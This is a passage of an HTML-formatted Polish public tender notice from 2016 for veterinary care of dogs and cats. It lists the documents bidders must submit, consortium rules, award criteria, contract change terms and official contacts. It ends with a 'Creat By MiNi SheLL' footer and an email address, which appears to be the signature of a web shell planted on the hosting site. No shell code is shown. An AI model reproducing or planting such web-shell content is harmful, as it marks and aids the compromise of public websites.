                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykaz całodobowych zakładów leczniczych dla zwierząt będących w dyspozycji Wykonawcy, w których będą świadczone usługi weterynaryjne  zgodnego z załącznikiem nr 5 do SIWZ wraz z załączeniem aktualnych wpisów z Okręgowej Izby Lekarsko-Weterynaryjnej dla wykazanych całodobowych zakładów leczniczych (zgodnie z obowiązującymi przepisami  z ustawą z dnia 18 grudnia 2003 r. o zakładach leczniczych dla zwierząt Dz.U. z 2015 r., poz. 1047 ze zm.). <br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Oferta powinna składać się z:
a)wypełnionego Formularza oferty - wg wzoru określonego w Załączniku nr 1 do SIWZ;
b)wypełnionego Formularza cenowego wg wzoru określonego w Załączniku nr 2 do SIWZ;
c)aktualnego na dzień składania ofert oświadczenia Wykonawcy stanowiącego wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego, o treści zgodnej z określoną we wzorze stanowiącym Załącznik nr 3 do SIWZ.
d)aktualnego na dzień składania ofert oświadczenia Wykonawcy, stanowiącego wstępne potwierdzenie, że Wykonawca spełnia warunki udziału w postępowaniu, o treści zgodnej z określoną we wzorze stanowiącym Załącznik nr 4 do SIWZ.
e)dokumentu (np. pełnomocnictwa) - jeżeli oferta, w tym wszelkie oświadczenia i dokumenty - zostaną podpisane przez osobę albo osoby działające na podstawie pełnomocnictwa. Jeżeli osoba/osoby podpisująca ofertę działa na podstawie pełnomocnictwa, to pełnomocnictwo to musi obejmować uprawnienie do podpisania oferty. Pełnomocnictwo musi zostać złożone wraz z ofertą w oryginale lub notarialnie poświadczonej kopii. Do pełnomocnictwa należy załączyć dokumenty potwierdzające, że osoba udzielająca pełnomocnictwa była upoważniona do reprezentowania Wykonawcy w dacie udzielania pełnomocnictwa (co można wykazać w szczególności przez załączenie odpisu z Krajowego Rejestru Sądowego lub informacji odpowiadającej odpisowi aktualnemu Rejestru Przedsiębiorców pobieranej na podstawie art. 4 ust. 4aa ustawy z dnia 20 sierpnia 1997 r. o Krajowym Rejestrze Sądowym (Dz. U. z 2007 r. Nr 168, poz.1186, z pózn. zm.) albo zaświadczenia o wpisie do Centralnej Ewidencji i Informacji o Działalności Gospodarczej zgodnie z art. 38 ust. 4 ustawy o swobodzie działalności gospodarczej z dnia 2 lipca 2004 r. (Dz.U. z 2015 r., poz. 584, z późn. zm.).
f) Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ust. 1 ustawy, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia;
Dokument ten powinien w szczególności zawierać następujące informacje:
-zakres dostępnych wykonawcy zasobów innego podmiotu;
-sposób wykorzystania zasobów innego podmiotu przez Wykonawcę, przy wykonywaniu zamówienia publicznego;
-zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego;
-czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.

2. Dokumenty dotyczące przynależności do tej samej grupy kapitałowej
Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej Zamawiającego informacji z otwarcia ofert, o której mowa w art. 86 ust. 5 ustawy, przekaże Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23 ustawy  wg wzoru określonego w Załączniku nr 6 do SIWZ.
Wraz ze złożonym oświadczeniem, Wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Dokumenty należy złożyć w siedzibie Zamawiającego przy Al. KEN 61 w Wydziale Obsługi Mieszkańców na parterze, stanowiska 2 lub 3.

3. Wykaz oświadczeń lub dokumentów, jakie na wezwanie Zamawiającego mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu oraz braku podstaw do wykluczenia z postępowania:
a)Wykaz całodobowych zakładów leczniczych dla zwierząt będących w dyspozycji Wykonawcy, w których będą świadczone usługi weterynaryjne  zgodnego z załącznikiem nr 5 do SIWZ wraz z załączeniem aktualnych wpisów z Okręgowej Izby Lekarsko-Weterynaryjnej dla wykazanych całodobowych zakładów leczniczych (zgodnie z obowiązującymi przepisami  z ustawą z dnia 18 grudnia 2003 r. o zakładach leczniczych dla zwierząt Dz.U. z 2015 r., poz. 1047 ze zm.). 
 
4.Dokumenty podmiotów zagranicznych
Wykonawca zagraniczny składa dokumenty zgodnie z zapisami pkt. 9 i 10 SIWZ, ze szczególnym uwzględnieniem, aby dokumenty złożone wraz z ofertą potwierdzały, iż oferta została podpisana przez osobę/y uprawnioną/e do reprezentowania Wykonawcy.

5.Oferta wspólna:
Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej       Wykonawców (w ramach oferty wspólnej w rozumieniu art. 23 ustawy) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:
1)Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.
2)Oryginał pełnomocnictwa lub kopii potwierdzonej notarialnie powinien być załączony do oferty i zawierać w szczególności wskazanie:
a)postępowania o zamówienie publiczne, którego dotyczy,
b)wszystkich Wykonawców ubiegających się wspólnie udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,
c)ustanowionego Pełnomocnika oraz zakresu jego umocowania.
3)Dokument pełnomocnictwa musi być podpisany przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, przy czym nie jest wymagany podpis pełnomocnika. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców.
4)W odniesieniu do warunków określonych w art. 22 ust. 1 pkt 2 ustawy wymagania te muszą być spełnione wspólnie przez Wykonawców (nie musi ich spełniać każdy z Wykonawców składających ofertę wspólną osobno).
5)Oświadczenia, wykazy lub formularze sporządzone na załączonych do SIWZ wzorach, składa i podpisuje w imieniu wszystkich Wykonawców Pełnomocnik lub wszyscy Wykonawcy wpisując w miejscu przeznaczonym na podanie nazwy i adresu Wykonawcy, nazwy i adresy wszystkich Wykonawców składających ofertę wspólną.
6)Oświadczenie, o którym mowa w pkt III.7.1. lit. c) i II.7.2. każdy z uczestników oferty wspólnej składa indywidualnie.
7)Kopie dokumentów dotyczące Wykonawcy (członka konsorcjum) muszą być poświadczone za zgodność z oryginałem przez tego Wykonawcę, którego one dotyczą lub przez pełnomocnika.
8)Pozostałe kopie dokumentów, inne niż wymienione w pkt. III.7.5.7), muszą być poświadczone za zgodność z oryginałem przez Pełnomocnika lub wszystkich Wykonawców.
9)Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem, którego adres należy wpisać w formularzu oferty.

13. Wykonawcy polegający na sytuacji lub zdolnościach innych podmiotów
Wykonawca, który polega na sytuacji lub zdolnościach innych podmiotów na zasadach określonych w art. 22a ustawy Prawo zamówień publicznych, przedstawia, na wezwanie Zamawiającego, w odniesieniu do tych podmiotów, niżej wymienione dokumenty na potwierdzenie braku podstaw do wykluczenia tych podmiotów w oparciu o art. 24 ust. 1 pkt. 13-23, tj:
1. informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2. oświadczenie podmiotu o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo  w przypadku wydania takiego wyroku lub decyzji  dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;
3.oświadczenie podmiotu o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto </td><td>60</td></tr><tr><td>Liczba miejsc dla kotów w szpitalu dla zwierząt </td><td>20</td></tr><tr><td>Liczba całodobowych zakładów leczniczych będących w dyspozycji Wykonawcy, w których będą świadczone usługi weterynaryjne </td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />W odniesieniu do art.144 ust.1 ustawy Prawo zamówień publicznych - Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w przypadkach określonych we wzorze umowy stanowiącym załącznik nr 7 do SIWZ tj.: 
- w zakresie maksymalnej liczny planowanych zabiegów/leczenia psów i kotów w 2017 roku, z zastrzeżeniem iż nie może zostać przekroczona łączna maksymalna cena ofertowa brutto
- w zakresie zmiany obiektu/obiektów w których ma być wykonywany przedmiot zamówienia w sytuacji, gdy do momentu podpisania umowy zaistniały nie dające się do wcześniejszego przewidzenia okoliczności powodujące że spełnienie świadczenia (tj. realizacji przedmiotu zamówienia w obiekcie/obiektach) jest niemożliwe z przyczyn niezależnych, w szczególności np. z powodu zniszczenia obiektu/obiektów wskutek pożaru itp.  z zastrzeżeniem, iż nowy obiekt/obiekty musi/muszą spełniać wymogi określone w opisie przedmiotu zamówienia oraz posiadać co najmniej taką liczbę miejsc dla kotów w szpitalu jaka była deklarowana w ofercie. <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 27/12/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              PLN<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1. Osobami uprawnionymi do porozumiewania się z Wykonawcami są:
- w zakresie dotyczącym przedmiotu zamówienia:
Krystyna Nowak  główny specjalista w Wydziale Ochrony Środowiska,
tel. 22/ 443-72-61, faks: 22/ 443-72-91,
- w zakresie dotyczącym zagadnień formalno-prawnych:
Iwona Glinka-Kuczyńska  główny specjalista w Wydziale Zamówień Publicznych,
tel. 22/443-73-33, faks: 22/ 443-73-32, 
e-mail: zam_publ@ursynow.pl  
2. Otwarcie ofert nastąpi w dniu 27.12.2016 r. o godz. 10:30 w siedzibie Zamawiającego przy  Al. KEN 61 w sali konferencyjnej - pok. nr 524A  5 piętro.</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com